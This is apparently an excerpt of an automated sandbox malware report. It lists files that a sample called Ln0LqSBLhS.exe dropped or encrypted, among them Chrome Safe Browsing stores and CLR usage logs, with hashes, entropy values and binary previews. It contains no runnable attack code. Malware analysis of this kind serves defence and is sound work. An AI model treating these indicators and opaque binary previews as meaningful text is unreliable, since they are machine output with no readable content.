                                                                                                                                                                                                    Preview: .....,m..{.n./.F*..9.wG..C...v...v.} {....p"......MQC..:=i.py...G..DH...S..Q.g.;.j...w..p"<..z..!5l.Md..+.....W.a.......37+.o.,0.,.......Y.`..".A~.z3..;...."l..8.{Ai./cp....z.Pm{.p.......I....`.......#.C.}.c3..9.3.I.u...x.?.8.Y.b./...T.*.. ....2...d...0h...]...........sYe.....X..Z...]l..^.IR.`.J..Iqz...........m.MR82....y..s..!.sy.CB.f...xl.Zt...."v.u.K...G|:.....I..`B.A..Jot....,..m...F.$..ShO...W..L.o.j...QTF..6...D..'".Yk9.-.........*.m().!k...\....3..M....v...../.\...X....{.RR.f.Z.j&.....\........".q...s.v'.q. ..^)Yxo.p!.]$.....w..W.....Zh..n..=.3..]..Q1......d+.].}.;.4)...&.....T.(t....B....\.8..#.H..(.L>..2.._.K.I.......b....`.'.S..6.....\,..o...N.yw..3.S...X.#%PRe.t....{E(.8."2Yh".D8Md.m..0}.k..J..d&.My.&.....f.&.i..r..sR.L.(yW\._.[73..\..........4i.v..).}..*.....#..B..1..._..l)..[....`. .}..n..hr.,:.~..Uzd.....~c4.,..Q+.{..Wz[<......;.Fw.JU..t.aR.....a4.Qc.{a..rZ!.3`.._2OB..c1...%..'.....{......'..n....m.T.....<D...P.....7.B...Ve*.$..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalware.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):103568
                                                                                                                                                                                                    Entropy (8bit):7.99822090908286
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:b4hjYO8j4EBfPI/vIIcUICr0e67DVTqFmtLwfhn:E1YjBfyHBh4/ft85n
                                                                                                                                                                                                    MD5:F43853E8D61185A7BB6B5FB8251518C4
                                                                                                                                                                                                    SHA1:A61F3CDC53315389CC1E3E4EC18795016C0CF245
                                                                                                                                                                                                    SHA-256:83B4E847BC620474FB43116BDF081055B175C6E7525F9241EA6242F93FE7449C
                                                                                                                                                                                                    SHA-512:774B9A741D10AD19DDF9D1C7DFC5F276B8B6250335AC2D2DA433C8EF9FB6CA81F109457A4339C86FCE5E5DFAF63D8FED3B20674E9F5E2ED3AED9636AE7B10953
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: @`..gXi#..1.TD.F.._!)...$..P^T8...r.!.|.. !~A....s?5l.,..>....w..zQe..;qZ..hd@.....O....>xy2..9b.d].S:........^.iSk.^.u^.:MV..w...W..4..C.6f..Or8.i... .YD...0..]=.Tt7.k=.......M.9.&YH.x[..v.....[.....$.....,.....~.....p..:...r....7B9M;.K4.."I.z.Vt...i$.#....h.....r..+J)q&.....G..0v......$.-.....2.../..s...F...H.Pd.>.rb...n...!..CR....88.#8c..".Y._........Hl..q......7.T.D.G8#..k.#.@......r..x..=!.?.L.D......=t>.f&I.J.R?g.....HC.=."N..E..Bv.[..(.......nf;.P...R.]..W|.+.M<\^..-.u!.L......A.@...."W.^H....:..N.a...ND.7..q...]-.w..).`........fk%|.SDc.o[.V.x.V.^..o.7L..9..j.3.h\.F.9..a.Jb.8......Q].i..F..t..5.&N.l.\`xU.*G...XNw. 2.J............{..[av...B.>k.s.|......+..&?..k..n4.[.e..1..!...E./+..l.d.#.....^...L.ZaME.h.8k..#.k..&.Y.9....Z(.6V...F4...*...E%J.9.Z^.h........h4Z'i6C)...a*....T.5N.=D}...5..y..z.......5:.h9}...0...4..t..B.....}...p..V...,=zc...$qC..X....2... ..9.G.......p.F...Ju.....v...G(.b{.C3.mR....M...jK.F..g."...,.P...q.p...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998880437228105
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:oDJUGNqCObaC27LdGvICTmfBDMJDV8Fyz+C///wubA6y0:A7YC7Z7LdGzwMxWMzZ7A6y0
                                                                                                                                                                                                    MD5:AE54B877F6EB938D4E92F4E9E78450A2
                                                                                                                                                                                                    SHA1:AA9F361AB2A029634A41F661E70461C2DDA3C174
                                                                                                                                                                                                    SHA-256:29DC7487E97DA45E5A2A142B4955091DFFD4F2A9BA8F41A428484F7A1D53B597
                                                                                                                                                                                                    SHA-512:426CB735290FF9C2120D93F66B2E8D860EE8AB4E62F1A19FE29F5F9DE2F3F7E0D8CB9CEBFF279335E663D6D19C298A21F47E989CFD0E1179E4B58A761F109F70
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]..../...5^.........N\..b.........F..I....[C..f.~m.\..A.D.e..Xl..p.X.PtRF...;....*.)...G........HAsC?j._...f..eB..O;e.@.tA...#.......$t..u......lm..f...f............um.av..S..........N..tf........4.b...sc...L..G....M.}B.f .P_...R.]..s9.....KG.k.JX..X.X.p..L..$..H-.,..e.J.v)..."...l\.w.".p..?.l..?............*.......=.2.5!Gy................H..h.....H...^~#`..N.#.e.O....$-D....C.JR.q.Qn7-..\\.?..K.{..5..Cz.......rz...a....._uhO.TB.....M.....v'?.k....v.]...i.m.#.:...}4....W..N5!}..t.Ar..w.e...E..+..qR.1-....L......4.c.^Q.....V.~.6.0............/K.u.....2.-T....3~..e..Yq.A..t.y.p!i..;.-..J.8*.g..P....@....* .......x.(..._v`..2..N...q..z....D.V.;_.n.U'W.f.....Vo..L..j......K..C....U._.ymc..7..5....Bw..*D..l.S8;..M..G..4H.-.v<t .P...t.&h.zr.M.}.t...7c.&4..'6y..$.<.j.]..xiWa...|O..Y8Z..$.k..........d...ML...Gm...a...m......~.f.......#..l....`cnK....7..K.;..d..Q..~`....q.M.?..[.5....o.OM.;.....A....&.g*..8.?.e .........]..B..Ls.|...f.\,.._.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSubresourceFilter.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):128855
                                                                                                                                                                                                    Entropy (8bit):7.9985250577206015
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:INd7zcg8W78ERhtT+CLhiWgJrBkiwDkGhIYfHJB:S7IPEvt6Ihh0SSPCJB
                                                                                                                                                                                                    MD5:C4A46349C705852DDBD619E658FC9907
                                                                                                                                                                                                    SHA1:0B2AD326B7F56F46664EC04DFD31693B21E164ED
                                                                                                                                                                                                    SHA-256:2EE4F2D78A601BE61C8A58849C8BE6306338920E5EFB134C64171FFB8F90E768
                                                                                                                                                                                                    SHA-512:C3FFDB6F01BAD70B6E075541747C2A190CE93AAC28DFFABFAB9DF7DECB9F2DA84A79EF17B03689D1A6B9DF009529A220C79348CF11398879992FC3CB9EF62D1F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: A..............:........~.^.#\..a.2kN....c......yV;.;.W.3a.w..J....v)..U.<..&.L.PV.EU[l..,...p.3....<.g.3.E.......pW..s.D.S.0..x....0.^|...:.,g8Qg..)\z.9*v...B......H..J.y.........'..u...W.9.e.Y.0.M..oS.....h..5...d.3.`.4..9..E...]o.M...f.S.U.T/..!^tS.7.Fm9.$(..C.@...8."...3a<q....{..6.YL&.(X......*.....b.2.;..t..v@.G..BO;.o...6%..=GD7.:.......q.&J..)..W.t....^....*.....L.)...dr<..z...;........|..!.. ........VKn.....=..C..T#...+.P#....b`&2.x<`.m2...86+c....(..s..`....}..D..@[!...g;..7...<TV....B..rE.=..T.;M...c..{..i.+..0|MZ....`....Y..R){....V":.^q.....B`...*.Zy..+.5b............!..eG.. ........H..R...!;...YpK~..k.Q..|`_...k..g.t...;a..~.....%...a...@A..Z O..X.S......Aw....fwn..E..K..W3|.....M`+.i.......A....xf..+..L.0G.:.u..D.}.)....*C..f/..WEm.".O5.4.\...9..r....J..~1...\=...R....=,..k..........c.T......k..,..o..F1D..W..j;[:.~.....y=.e...+u.}..X8..=.s...6...E2...a..9.....x.`.%=Z7.....!.....h..,1.6..........~=X*.z...>........I./oh..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSuspiciousSite.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):13572
                                                                                                                                                                                                    Entropy (8bit):7.986755387082616
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:3R/9qPzg1lR381xDTdxngkR7nhHPKmKEeVIzx7:3RAbg1lR3+CkX0cl7
                                                                                                                                                                                                    MD5:431D37AB4C0B852ECE85C5B0483E0A43
                                                                                                                                                                                                    SHA1:728667AF3DD0AD3D7538093BA81440353C3ABE49
                                                                                                                                                                                                    SHA-256:49DE08E997033F15982EF60DB29CAF7DE46F3D0057EE77CF370852C7889D068A
                                                                                                                                                                                                    SHA-512:C36CA8214067A2B832B42F0DE29D22BEA12B39EAB8608E8A0B0E93792298AD4C346A9BEDCC2AB2BE4F406219270D0145311FAE1AAAE89551B4B7B874FB423A50
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: x....Dwk::].?.._e....n.<..<.'>D..).l.UR~D..5i*.[t.U.&...V...-...8......w...*bAL...Ga....n..X.w.[..M..,.n........:{P.s....d..ZBF.....F.08f%.Y|...`w.....~.i+..A;..0 .:".tz7...|.H`.TQ.....J!..;_...6.rpw.@.....hDo..n$.... ~v.....KU/Q}.....[.....=! ...,s...W.c..n...0<P[.[b.#.K.(va....k...&.)(A..g........>1W.l@..$.b.K..R..d.E.2..A..aLe....T;..X8.KN..[.8.LrL..L.V.3..o.....S.kU.Y.<".2..b........Q%.....0.tUC.R....:otv.,.6.:...8..7.jS...%..a.@9....v.}.u...~D.!_8,M...../.w...4k.7PF(..PUH.1..O7d.!$._......|m.p<x6..-.=.SQ.f..>$..ow..a.J.1..9*...3..FM|.. X$...<...L.g.,...t.c.s!..v-...C...I4j.R~.G;..... .....I.....m.f..e.@H.....V.@...j.%..`(S......i..&. .M....z..<.U.Ib".%..@..f[kC..V...Il#=......1G....V.F...B.K..viTi.l.;.+...p...!...t.a 0..h.>Hr.....bN....../..&.O..! .i.dp...k...x..XQ..\p...^.. p+x...-*...C.t.@.=.D.m...#eIV....{../..q[..r...?.l.w[O...{.i>0s. ...yq.=._..EWK..n...7"<..0.....|=[...(...!`<O..)K...^x~.#.yR.%D@_....|..^..6..}.....8..IHO....05y..X...8...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlUws.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):78256
                                                                                                                                                                                                    Entropy (8bit):7.997495324741277
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:1CLOCaCWZkIROa5KReEaHSgREFMsTfTBQf/MS/Xt9OdYnpADGkumyaCR306L:1CLOCaCWrQa5KMEaH3wMi9QXn/hpADPg
                                                                                                                                                                                                    MD5:7E42D33FC721DA477BFDF50992B38576
                                                                                                                                                                                                    SHA1:3C4F10CA2E1E7BF08380E061348E9BD123E79CDF
                                                                                                                                                                                                    SHA-256:F8B57A8AB6B67833BFD8F92648E9782A85035226D761A1EACA798562FA1E1C8D
                                                                                                                                                                                                    SHA-512:E3C7E36EB3A0A69FBBE1EB350F369CBAD417BCCFD1806912ACCF304B934EB1D4224BD7B73E82F1E27BF5841CF99558D6558B4BEDF720AD9D7AAF7E17F53AA362
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...lD-..._.......zP.6q..R.fD.o.!..|aj.a.X..c..,..`...&...........MU..U..c.).n......y..u].2.I..>.wu..C.....4Y..kSes.....g.P.m.@...{........".....].dh........l.X|...?.9N..3/Jz-..<%E..A@.J.u&*.G.......-.u .9...8..F2....O<......*..o.=.G.].....k.....06...<..J...H...:..Ha.".O.j.*#g..=...?.G...}H..eP.y2..m-...nMJ..h.+w..k.D.O..m............Y........=..j....I`>.%..,m......I....'.-......g.v....#.....p.....)..V*/..^..z;....b.Qn....,/..^L^ .A.)[[:...}M....KM.7......i..V..u...1.wj...!.y!.......K...........`u...]8z.tBQHDLD.Ob.......O0.B.U`r>h...1$...6.LA...0......y."....J...-wpjD.m5{b2..R...W..[E....f...H...QCD..b.._.81 G.t4Ef....n...Y.AtV..q....WQ....9h)EAm.Br'......f...f>_.4$.L..L.t.Au.y.dM..Q.......8<v.p..v..?....F.,.H...h..;x.\..M.Z..n.....q..*p^..K.|Ob....[.....5X...q.....l $.V....i.d.+..2T.v=.dw\M.....|*B .1..?.d.{....r.X r.......8....Gqg..E..-..B...f..xB.[.z.o.....!.../(..U..^..>..{|$#2L.|.eU...).....i.#.Ks.%...a...Og+.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\IconCache.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18194
                                                                                                                                                                                                    Entropy (8bit):7.98816061547235
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:JF+166d1D6rcc2Ni0ZA2a2bNOv41YBSGD8SlhcEVPpGXoDyC12pKdLTKZr:fF6d1D6rX0ZA2aCY2olWmPpGXoDT1vpO
                                                                                                                                                                                                    MD5:3C2270FEDAC009E6CA9E377FBF9928A8
                                                                                                                                                                                                    SHA1:3376A4DFB5B0218C65E467F662B2FCC40021F9B9
                                                                                                                                                                                                    SHA-256:D0CD189863ECF06C7D7211C665774013F71BA35A05EEE3B499697DF73E06A056
                                                                                                                                                                                                    SHA-512:B9BC7110CC1FDD74A335CE40CDFEECC3C19A87622E89C83010CA066B9527EF47E79D641CB8B95FB392F7AC3B56E221B2007F8FC35E042126E078C3B973507AB7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: w:....lB.....8....;.I....+@.&/^..........d.8....'Z.l..]Y......G.A...iZjT..k8.A....S..i/=%G.~>.C.j..q.xE&.a).....iVN..p...\.tG6...km^dA.^f.\...........;..3.P#........0.._.6../....&.v... .....k..:.......K.w.6.....5..8c`@....6...%Y...m`.M{.....G...@...Z....]>51...,$...a&...2Y........+.......^...D...g..._...fD.0.W..h...F../.....,..u\..K0z..w.-...t.x.....:..'...i."yt.....`..Zq.....H.....V....(,.M..J.......6.=^..RT..Q..t.........y..G.lUP .^..f.p...f.:P..^..c.r`.....c.8b....A...3...c.XsOA......c_......Qm...D8.R..{..F..W.....F..Q....#.%.;.C.$E.K.....j.....).|`@.1*S..I..!..xg.A4...u..4....:l...*-..{...B..f]..q..:......Y..2..m....}.4w.....v9o.J.).&f.J....m..0(=.&?Y.A..Fb.QV.{....2QN(..T..8....%.F....l%0...).B.3.M.M...R..J[.F$/;..o.jV/.....W|.t..........c*ku#8.46........fd..X'....h=.-r..OZp0...~....m.#r.)..#...FSm.....D~..Ybm....e.Z..h..._,1.?|.;..3.....g..|..6_.+...d......0m......hw?.u...[tc.1:S..5.z|.xe....A..E.G..M..h]..Q......pDz.."
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\addinutil.exe.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):532
                                                                                                                                                                                                    Entropy (8bit):7.539314432587971
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8meb7F7L3G6QV55jV/1i6m2r3Ub4scii9a:8mevF7znQVPjhQ6FrEcsbD
                                                                                                                                                                                                    MD5:07B4A8F8204157F3B0DA7433F8A70D94
                                                                                                                                                                                                    SHA1:BC7E879DD5A025AF633502CBFC683D0D7868E733
                                                                                                                                                                                                    SHA-256:7CBA96DACE0C4DD90DA5D010CDE8BF345C0A52ECF07B0621AD37F9736E4B3169
                                                                                                                                                                                                    SHA-512:B80E947E1B62A4B28EF1E52B22A9057DD94D237C9DAE42D59614CF6136F7D47B2DB9DB1A931DBC0714B61C5C6044D30061F281DA19FB4FB48FB0E979A9F73C12
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...`.......c.hl...G..G.\.<.#.xJ*r....%.4>..4.y..e.......#..eI.I..:....A(...M..q.w.F4yS.p......+Z......]v.Y...~.........Yz...9(..(....r.r...v..N.=....c... .W.D.K...D2....^V.....Y..N....t...z.....O..2..8bQ...t.p..!.{.Q?G3..[O.~A(.....4..........x..t.{....<;<...sn..h.4..[*.~'....B.&I.2C...\.g.........7@.......G...DKc..5..0j.#.(#.u..s.".CX.!`B......p.Zd.`(Z.e.....\....V..^......)4....wq.Zz....W.Nld.$..J%....f$.^..........s...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):717
                                                                                                                                                                                                    Entropy (8bit):7.655625493894432
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:AwB0bq9PvlTeC7qaRgYMqSfGLLRY5Zplqq4x44LCgQ1KuClomllaGAcMxNMO5vR8:AwBM/C4bqSfWlY7q6gQUuCl7l7Ackxvi
                                                                                                                                                                                                    MD5:5CB074AA902E177EF342D220F4BE0401
                                                                                                                                                                                                    SHA1:417D0A06AA3E1AA0B9EFAC8423C8FE77CD2FD42F
                                                                                                                                                                                                    SHA-256:DCE689195BC789F41B9CE774DFFD2128E9B4396C85FDE004EF562453D755A979
                                                                                                                                                                                                    SHA-512:305B4ED4A491AC594C6C709FBC1EA61BA1D83A50905D260C329C65AACF2A9434EF4ACD39B71F27D67EACFB9011FC73A0134FCB7868A901E0C1392345747E06CA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]-5:M........*.8...x.*!.....$.S.n.r...L.c`.t].-......zm..q-..15G."W.Whz.3,....y.....v.z.7N.o O..d...|.u...:.;@O..D(n/..M.c......'.......n..X3...<..7]..8..E.iTp...L....;o..A.dB.$.jH....d.|..8o.......F..[.GC>mi.20.sN3.u../y.c..)/Y.(E1<.7...A..r..J.W.w.|....H.C?........SJ4.$..Y1..Y.n.jv.1D....[.l....>.B"is.Y.3i...\hS.^6..I'...0..|.Z..]...H%:x....(..Ng........*..F..d'.(..I......z[..\-=U..}]F.E5.I....:!...R...........R..B.`..u....<...&J.-..]..&E.l#...#. VsPw.D...y..x=.&`.!..#....P..........{........V.%.],....>....."0.c{e.H...a..o..M+._34..<.7.j..V.....l!.W...M.7$....L.Y.)V.&...4=gO?....`Nc0.....O...v..'...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):971
                                                                                                                                                                                                    Entropy (8bit):7.783322105746818
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:74RJJkHY8S1KY/HRsDbVGRjQRTG97HQbD:74qxS5HRsUJ2gHKD
                                                                                                                                                                                                    MD5:311E4E0C676A994D88EF074BDF367C0D
                                                                                                                                                                                                    SHA1:B93231A0F8BA43CA18D4DCA10D1F0EC31D6403F9
                                                                                                                                                                                                    SHA-256:753FED11E05CDF93D5F553726D6493D4DCA7717176B837838D6C8E8C2F332C50
                                                                                                                                                                                                    SHA-512:0C1CDDCEA1543B2AE54867AB844F2783F5F5F7059CAEAB8C3468A2ED4ADA95B09FC88E68EE7FA31C4FA2DE847EC255B9D670D7696EB94931E21A6AB91A0D61F6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..Q.z.....0....w.=.x....W.Vz.g...e...f..+.*nM.9.V8...h..6.RL.Mq...a...M.?..."..R..."......2....F.M.3L.e%#..h$=..h..L.i,..X....+..~.E.Y..3d...^MV.g...X.EZ..J...YG.....;Bp....#..V8.2...p.g>f...?g.]...UYb{.i6.....^.R..,.S../W.3......M]...T.u.94Y.JF...G.U.....Y.=...+.h"}E..W.....j...S....(}..i.....(.{I..T...M....w.+.5G.%.....q....,c`ww.?D.gr...0.$..I}..8R.:.[.;...k......*.....P}..<4WJ...].g.O..X.,*.....hB..k.*,...W..G.....b.....D.ry.......?....!.........A.T.Q..........p.$....,....Ph.....?w.K.J..o ...0.u.F....^..;d..M....1b.o...k..KH...fzX<.n...b......6F.qu..+..V........:.V.CV..zX.l.../Y'lQ{.G.qB...y@n....(/.-6:.....]X...k...x..t..:.....i.7...&9^n.vvZ...^#.1h.%..1.t...39...0UA6./.......L.Epr.n.b...HN..t.._..cB%.?..q7..@...v..-.,.._.q.@..0..{.....MeRs}..;.l.].-..^j.Wb&....S..t.~.y.1.&.HX......F2..lw....Q..[...Asm..{.....N.6....p,.....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6132
                                                                                                                                                                                                    Entropy (8bit):7.967075557384897
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:VUTn71jLu3hayzCP58BnxTZynHgY2+PIQRCGzMcwiEtulBUF7lXJ5bEC53x:VUr71vHuCP5O6AY2khccwidXUFJJdP7
                                                                                                                                                                                                    MD5:086C40FA4AA9AE1D0FBC156CB3F5961E
                                                                                                                                                                                                    SHA1:17C4C6AB8471E08DBDAED496373EAF98BD2A9D47
                                                                                                                                                                                                    SHA-256:0A017576F423A20E91B238AE50E422BE52C27F261CADD2212775B80A13646D0E
                                                                                                                                                                                                    SHA-512:A028F581716AE76A50FB1D81A314447F41550B621B6A1C204F51E888D1DD544963C1AA17ACB533695F97F2EADC634875BC14D375C01D2169336A8EFC6DA729F5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .l...Z............b.d.......3.R..(..t.'D.d..y...0^..JNi.M..a...E....W..*Z+trk.U<....<2...; .yp.-1...d7...p. h....s..:'DA. 5..7...4.......sKK...x.i$t_.?......KM.........D.$.....G..|..x..2.. .~`vNv|.an.]....g...G/eS..1....S...g.Cx........U..............N.He.r.v.H.K..>E...l(.....z{..........(P.....J...L.+...Gc......./.fw.o.=..|#..../}0.q..~2.......0.*..n.4P..~.............2,l..+$ .~..=j"..\.....V.!....+<G..xz.f.b1....%...6w..a.S...I..i.>..\.I..3-..]...KLh...4f...}N{.m!=.z..nN..9{.P.v..b)g.r.&...".|*:2.j..A.I.8k|.T<.0i.hN.\.vp..E.<...&.;...<..~..8x........p.(._:.....\U#..".....]......`...x...%3."..Q.`............2.....bE:7[..x.l.......N..qz..N.g`..rE...(..J..;...E8nK.-L/~..Q.a.;*....b.lz..../...n....`.s~.....?c_..}.1%...).[.|.....~7O.........E:}.`t.......v.*..t\.*.....U|z2...0O..A(H....E.JF.U.+e|L8<9:......r.>...g.G..T.46..6!q....>yz..y.../..X...{....^......Zx.q..k.7....t.v.Nr...|..uAX...b|8..{)..g..}d....}`>.u........$!X.....t.?......_..?P.a....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\ngen.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):664
                                                                                                                                                                                                    Entropy (8bit):7.636822951070409
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:TTQWk0rbhGIYMO5KmcKPvDEnIkNByUvDfZQK7G1mbnw7LL2cii9a:oWk8bhfYV0dKzEnIkN55Pnw7ubD
                                                                                                                                                                                                    MD5:9A90C851502E2023608AAD00A8703F11
                                                                                                                                                                                                    SHA1:48199B7FA7E5FA3752D48F05D3CA3AE3720D9319
                                                                                                                                                                                                    SHA-256:366FF615F7EC57FF1850C21BABDD4F6D91E343B9EA4C62F380AABF4B5472BA57
                                                                                                                                                                                                    SHA-512:B191748BE889EEA1014A20C520F22975CCFE8813D801B3AC08BF8D5E8D7CD2B2EB4552E77C35ED26FAD78AE792E2DE9BA9C1F91257A1D66BA2E391C28BAD4474
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: G.........~D...R}.f.....3Pv..[.v..:...r...VZ.r....@R..MoT..a.c.....|......iQ.r.Q4.y....q.*...T...u.....E........Bh|.^V........=.6..}P.p=...N/...P.fG./..rVYg.53z......k....1..DR......&....R$s9..&."....8).m.*...r..:......[...f{...... .... W....j.....q..O.z..!BV.....&....K..AV.q.*.:X.;q...P.E=..\DG....vb.....]N...(`J.[.......A#..........5l.Xp.....ho9.\fSQ396mI ._.@..R>..o.f....Q. ...../E6w]...$..........#.\h.*....N..T~@/b....}..*.=.K.....(..f.0..v..N.}lez.9..)5...#;Z..t..bd.w2.%XF..:.....k.2..d..O,...^9"..H....L.[I.v...yR..v6.!X*...J..E).....3......K.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):846
                                                                                                                                                                                                    Entropy (8bit):7.717525940106376
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:an9jBBoDlgXrvzVMdZhO0L80qOH5R63V7bD:aJoD6brmjhO0LbFe/D
                                                                                                                                                                                                    MD5:B983453D9B8D96CA7B8415FEABEC222A
                                                                                                                                                                                                    SHA1:11C0D626CA7A60ADEB7C143E41B0BACF709B47D1
                                                                                                                                                                                                    SHA-256:5E538A4955AFBA49746977744C0D24E75950416C7CD8A86CA800CDA78413AB11
                                                                                                                                                                                                    SHA-512:0285A97F18E154D44ADE5CBE54E3919B0BE772214083ED56111E2A59848F80F8051F9A5C642B8CE02C3F34D68BF56A4EB2DEFC23610D07C0CFF4937C381CE355
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .G1u~..p......w2...<....1..].]..A.S.Fx.E.R.`6j....$..F......z.]:...z4..~i.ON.G.....|......dcS...Q.Z@KB..+...!..F.c&.W....|o.Q...P.E....?3.'.v(.E......z4-.~_O).RS\.k..F.J.(N^..g$.%.g^....D"*....p......i...x.j..... ..LdmC6.........N\.....6.uw......yu....9.......Y.v.T....."Z"6&...Nf..#.o...........>}Y...4.y........HH....}w...x.g.Jh{e.p.....W......R.ED..N...=.P.Y.3l.U.....8.vz...r..n...........w.$x....g?g.....Q.(..?N..UJ2hh+.F..!..$...<H._.X76lB.).c..,f.f..V....1.{.<;Tg.a.d.;..{..a...zWB.Z.u.......n.....'...<..A>.o0>.\.........6...%3.2.p..6.$!..D<.-l..+..<...):..a.....4.H....a.....~_Su.Tn..v.&..o.jS..5.<.+F.|....V..L|BFq?.7S..#^3.X....t....`......K...\O.e.KWx....N..B......$...5..2.oh.L...8LitR.UA..q...e{......q..3.H..q...rF.55VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\ngen.log
